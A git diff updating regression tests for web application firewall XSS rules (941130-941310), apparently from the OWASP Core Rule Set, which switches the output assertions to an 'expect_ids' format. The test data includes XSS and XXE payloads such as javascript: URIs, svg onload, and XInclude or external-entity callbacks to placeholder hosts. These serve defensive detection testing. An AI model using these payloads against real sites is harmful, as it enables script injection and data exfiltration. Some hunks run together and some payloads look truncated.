 data: "var=<vqk xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://749kfyxln3k7toui76fcrksjeak3nybzzsmlaa.examplefoo.bar/foo\"/></vqk>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 16
 desc: "XSS test for 941130"
 stages:
@@ -258,7 +273,8 @@ tests:
 data: "var=2010-01-01'||(select extractvalue(xmltype('<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % fhklu SYSTEM \"http://fzisa6stibffowpq2eakmsnr9ifhii6mueh45t.example'||'foo.bar/\">%fhklu;"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 17
 desc: "FP test for 941130"
 stages:
@@ -273,7 +289,8 @@ tests:
 uri: "/post/api/v1/query?q=7XMLNS"
 version: HTTP/1.0
 output:
- no_log_contains: id "941130"
+ log:
+ no_expect_ids: [941130]
 - test_id: 18
 desc: "XSS test with encoded newline for 941130"
 stages:
@@ -289,7 +306,8 @@ tests:
 data: "var=<chj%0Axmlns=\"http://a.b/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://a.b/ http://1pre0sif8x51eifcs006ceddz45084w4kx7ovd.examplefoo.bar/chj.xsd\">chj</chj>"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
 - test_id: 19
 desc: "Status Test Page - simple test for 941130"
 stages:
@@ -304,4 +322,5 @@ tests:
 uri: "/get"
 version: HTTP/1.0
 output:
- log_contains: id "941130"
+ log:
+ expect_ids: [941130]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
index 104001d42..0bf49cdb2 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
@@ -19,7 +19,8 @@ tests:
 data: '9411400-1=%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E'
 version: "HTTP/1.1"
 output:
- log_contains: id "941140"
+ log:
+ expect_ids: [941140]
 - test_id: 2
 desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in ARGS_NAMES
 stages:
@@ -35,7 +36,8 @@ tests:
 data: '%3Cp%20style%3D%22background%3Aurl(javascript%3Aalert(1))%22%3E=941140-2'
 version: "HTTP/1.1"
 output:
- log_contains: id "941140"
+ log:
+ expect_ids: [941140]
 - test_id: 3
 desc: XSS vectors making use of javascript uri and tags, e.g., <p style="background:url(javascript:alert(1))">, in COOKIE
 stages:
@@ -51,7 +53,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941140"
+ log:
+ expect_ids: [941140]
 - test_id: 4
 desc: "Status Page Test - x=x:url(javascript as GET variable"
 stages:
@@ -66,4 +69,5 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941140"
+ log:
+ expect_ids: [941140]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml
index 03401b696..e24ca1ea8 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml
@@ -19,7 +19,8 @@ tests:
 data: '941150-1%3D%3Ca%20href%3D%22test%22'
 version: "HTTP/1.1"
 output:
- log_contains: id "941150"
+ log:
+ expect_ids: [941150]
 - test_id: 2
 desc: Disallowed HTML entities, ARGS
 stages:
@@ -35,4 +36,5 @@ tests:
 data: "payload=<a href=# language=\"JScript.Encode\" onclick=\"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@\">XSS</a>"
 version: "HTTP/1.1"
 output:
- log_contains: id "941150"
+ log:
+ expect_ids: [941150]
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
index acbd0005e..474294e41 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
@@ -18,7 +18,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 2
 desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
 stages:
@@ -33,7 +34,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 3
 desc: "just another XSS teststring: <x onend="
 stages:
@@ -48,7 +50,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 4
 desc: 'just another XSS teststring: "onzoom='
 stages:
@@ -63,7 +66,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 5
 desc: "just another XSS teststring: 'formaction="
 stages:
@@ -78,7 +82,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 6
 desc: "just another XSS teststring:< x: script"
 stages:
@@ -93,7 +98,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 7
 desc: "just another XSS teststring:<f o r m"
 stages:
@@ -108,7 +114,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 8
 desc: "just another XSS teststring: '<f o r m' in User-Agent header"
 stages:
@@ -123,7 +130,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 9
 desc: "just another XSS teststring: '<f o r m' in Referer header"
 stages:
@@ -139,7 +147,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 10
 desc: "just another XSS teststring: '<f o r m' in Cookie name"
 stages:
@@ -155,7 +164,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 11
 desc: "just another XSS teststring: '<f o r m' in Cookie value"
 stages:
@@ -171,7 +181,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 12
 desc: "just another XSS teststring: '<f o r m' in ARG NAME"
 stages:
@@ -186,7 +197,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 13
 desc: "just another XSS teststring: '<f o r m' in ARG VALUE"
 stages:
@@ -201,7 +213,8 @@ tests:
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
 version: "HTTP/1.1"
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 14
 desc: "SVG onload injection with remote image"
 stages:
@@ -217,7 +230,8 @@ tests:
 data: "var='\"><svg/onload=(new(Image)).src='//m8vzjd10riomx3yxblmcnvaskjghsdz8xorciu7\\56coreruleset.org'>"
 version: HTTP/1.0
 output:
- log_contains: id "941160"
+ log:
+ expect_ids: [941160]
 - test_id: 15
 desc: "SVG onload injection in filename"
 stages:
@@ -232,7 +246,8 @@ tests: uri: "/get/index.php/%3Csvg/onload=alert()" version: HTTP/1.0 output: - log_contains: id "941160" + log: + expect_ids: [941160] - test_id: 16 desc: "Detect XSS injection of 'dialog' tag ('<d i a l o g')" stages: @@ -247,4 +262,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941160" + log: + expect_ids: [941160] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml index 2417122a2..0b9f50040 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml @@ -18,7 +18,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,7 +35,8 @@ tests: data: "payload=javascript:/*-->" version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: @@ -49,7 +51,8 @@ tests: Host: localhost version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: @@ -64,7 +67,8 @@ tests: Host: localhost version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: 
@@ -79,4 +83,5 @@ tests: Host: localhost version: "HTTP/1.1" output: - log_contains: id "941170" + log: + expect_ids: [941170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index 8761c2eb6..198966a9c 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -19,7 +19,8 @@ tests: data: '941180-1=window.location' version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -35,7 +36,8 @@ tests: data: 'document.cookie=941180-2' version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: @@ -67,7 +70,8 @@ tests: data: '941180-4=-->' version: "HTTP/1.1" output: - no_log_contains: id "941180" + log: + no_expect_ids: [941180] - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: @@ -83,7 +87,8 @@ tests: data: "var=\"-->'-->`-->" version: HTTP/1.0 output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: @@ -99,7 +104,8 @@ tests: data: 'arg=...(document.domain)...' version: "HTTP/1.1" output: - log_contains: id "941180" + log: + expect_ids: [941180] - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: 
@@ -114,4 +120,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: id "941180" + log: + no_expect_ids: [941180] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index 5b2724d56..7daab475b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -19,7 +19,8 @@ tests: data: '941181-1=-->' version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: @@ -35,7 +36,8 @@ tests: data: '941181-1=--%3E' version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -51,7 +53,8 @@ tests: data: '-->=941181-3' version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: @@ -67,4 +70,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941181" + log: + expect_ids: [941181] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index f81fc28d0..4312b627b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -19,7 +19,8 @@ tests: data: "941190-1=" version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: 
@@ -35,7 +36,8 @@ tests: data: "x=" version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: @@ -67,7 +70,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] - test_id: 5 desc: Test second replaced backslash match (\x5c) stages: @@ -83,4 +87,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941190" + log: + expect_ids: [941190] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml index 658e84c1f..039398355 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml @@ -19,7 +19,8 @@ tests: data: '941200-1=%3Cv%3Avmlframe%20src%3D%22foo.com%2Fsup.fml%22%2F%3E' version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] - test_id: 2 desc: Microsoft vmlframe xss, ARGS_NAMES stages: @@ -35,7 +36,8 @@ tests: data: '%3Cv%3Avmlframe%20src%3D%22foo.com%2Fsup.fml%22%2F%3E=941200-2' version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] - test_id: 3 desc: Microsoft vmlframe xss, REQUEST_COOKIE_NAMES stages: 
@@ -51,7 +53,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] - test_id: 4 desc: "Status Page Test - <:vmlframe src= as cookie content" stages: @@ -67,4 +70,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: id "941200" + log: + expect_ids: [941200] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml index f52702372..7d98bc6eb 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml @@ -19,7 +19,8 @@ tests: data: '941210-1=ja%26tab%3Bvascript%3A%20' version: "HTTP/1.1" output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 2 desc: Obfuscated javascript tag in ARGS_NAMES, with tab stages: @@ -35,7 +36,8 @@ tests: data: 'ja%26tab%3Bvascript%3A%09=941210-2' version: "HTTP/1.1" output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 3 desc: Microsoft vmlframe xss, REQUEST_COOKIE_NAMES stages: @@ -51,7 +53,8 @@ tests: Accept: "*/*" version: "HTTP/1.1" output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 4 desc: "New line in javascript prefix, with ." stages: @@ -68,7 +71,8 @@ tests: data: '{"url":"javascript :alert(7)"}' version: HTTP/1.1 output: - log_contains: id "941210" + log: + expect_ids: [941210] - test_id: 5 desc: "Carriage return in javascript prefix, with ." stages: @@ -85,4 +89,5 @@ tests: data: '{"url":"jav ascript:alert(7)"}' version: HTTP/1.1 output: - log_contains: id "941210" + log: + expect_ids: [941210] 
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml index e475286f6..1b54be604 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml @@ -18,7 +18,8 @@ tests: data: "var=v%26newline;b%26tab;s%26newline;c%26newline;r%26tab;i%26tab;p%26newline;t%26colon;:&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941220" + log: + expect_ids: [941220] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=XSS" version: HTTP/1.0 output: - log_contains: id "941220" + log: + expect_ids: [941220] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml index d165cd0fe..1fba86ff7 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml @@ -18,7 +18,8 @@ tests: data: "var=&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941230" + log: + expect_ids: [941230] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=" version: HTTP/1.0 output: - log_contains: id "941230" + log: + expect_ids: [941230] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index 2967f2214..da266e23a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml 
@@ -17,7 +17,8 @@ tests: uri: "/get?var=%3c%3fimport%20implementation%20%3d" version: HTTP/1.0 output: - log_contains: id "941240" + log: + expect_ids: [941240] - test_id: 2 desc: "Status Page Test - IE XSS Filter " version: HTTP/1.0 output: - log_contains: id "941250" + log: + expect_ids: [941250] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index de2b0b855..ff2d60e4e 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -18,7 +18,8 @@ tests: data: "var=&var2=whatever" version: HTTP/1.0 output: - log_contains: id "941260" + log: + expect_ids: [941260] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" version: HTTP/1.0 output: - log_contains: id "941260" + log: + expect_ids: [941260] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 87ea07326..ba6208417 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" version: HTTP/1.0 output: - log_contains: id "941270" + log: + expect_ids: [941270] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -33,4 +34,5 @@ tests: version: HTTP/1.0 data: 'payload=' output: - log_contains: id "941270" + log: + expect_ids: [941270] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index 7753e0936..cb30bdd5a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" version: HTTP/1.0 output: - log_contains: id "941280" + log: + expect_ids: [941280] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,6 +35,7 @@ tests: uri: "/post" version: HTTP/1.0 data: 'payload=xss&var=whatever" version: HTTP/1.0 output: - log_contains: id "941290" + log: + expect_ids: [941290] - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: @@ -34,4 +35,5 @@ tests: data: "payload=" version: HTTP/1.0 output: - log_contains: id "941290" + log: + expect_ids: [941290] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 4952f90dc..073fa65ef 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" version: HTTP/1.0 output: - log_contains: id "941300" + log: + expect_ids: [941300] - test_id: 2 desc: "IE XSS Filters" stages: @@ -33,4 +34,5 @@ tests: version: HTTP/1.0 data: "payload=" output: - log_contains: id "941300" + log: + expect_ids: [941300] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 7d7e98d5b..14f8c8907 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml @@ -20,7 +20,8 @@ tests: data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] - test_id: 2 desc: Positive test using utf-8 stages: 
@@ -37,7 +38,8 @@ tests: data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] - test_id: 3 desc: Positive test using alternate utf-8 stages: @@ -54,7 +56,8 @@ tests: data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: @@ -72,7 +75,8 @@ tests: data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: @@ -90,7 +94,8 @@ tests: data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 6 desc: Negative test for opening tag stages: @@ -107,7 +112,8 @@ tests: data: var=\xbc\xbc version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 7 desc: Negative test for closing tag stages: @@ -124,7 +130,8 @@ tests: data: var=\xbe\xbe version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 8 desc: Negative for missing end tag, opening tag stages: @@ -141,7 +148,8 @@ tests: data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 9 desc: Negative for missing end tag, closing tag stages: 
@@ -158,7 +166,8 @@ tests: data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: @@ -176,7 +185,8 @@ tests: data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 11 desc: Negative using real world Russian example in utf-8, variant stages: @@ -194,7 +204,8 @@ tests: data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f version: "HTTP/1.1" output: - no_log_contains: id "941310" + log: + no_expect_ids: [941310] - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: @@ -211,4 +222,5 @@ tests: data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe version: "HTTP/1.1" output: - log_contains: id "941310" + log: + expect_ids: [941310] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml 